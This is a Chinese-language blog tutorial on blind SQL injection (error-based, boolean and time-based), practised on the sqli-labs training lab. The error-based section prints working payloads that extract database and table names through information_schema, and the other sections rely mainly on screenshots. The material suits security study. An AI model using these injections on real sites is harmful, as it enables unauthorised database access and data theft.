web漏洞-SQL注入之盲注
前言
本文介绍了SQL注入的盲注方法。盲注方法主要是用在前端页面不回显sql语句内容的时候,如注册等。
盲注类型
报错盲注
报错盲注是指前端虽然不回显内容,但是我们可能可以通过sql语句报错来显示我们需要的数据。用sqlilabs靶场的less-5举例。sqlilabs靶场的安装请看https://blog.csdn.net/qq_44312640/article/details/127573726?spm=1001.2014.3001.5502。
# 参考文章:https://www.cnblogs.com/zane-s/articles/12371820.html#w58wxCp4
# 爆数据库等信息,原理暂不研究
第一种:or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
第二种:union select concat(floor(rand(0)*2),"===",(select database())) as xx,count(1),3 from information_schema.columns group by xx--+
# 爆表名等信息
union select concat(floor(rand(0)*2),"===",(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 3,1)) as xx,count(1),3 from information_schema.columns group by xx--+
# 爆字段等信息
猜解数据库
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102152934330-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102153033723-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102153927422-3.png?raw=true)
猜解表
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102160050485-3.png?raw=true)
猜解字段
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102160413151-3.png?raw=true)
猜解内容
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102161033854-3.png?raw=true)
布尔盲注
布尔盲注指的是通过and连接符等通过观察页面是否正常来判断条件是否成立的一种注入方法。以sqlilabs靶场的less-5举例。
猜解数据库
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102161724021-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162001012-3.png?raw=true)
猜解表
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162101171-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162145197-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162508846-3.png?raw=true)
猜解字段
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162624397-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162716981-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102162813842-3.png?raw=true)
猜解内容
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102163052626-3.png?raw=true)
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102163010532-3.png?raw=true)
延迟注入
延迟注入和布尔注入差不多,通过条件注入延迟函数,观察页面返回时间来判断条件是否正确。以sqlilabs靶场的less-5举例。剩下的根据布尔盲注类推即可。
![](https://github.com/kouyou-momiji/easyimage-image/blob/master/image-20221102163554096-3.png?raw=true)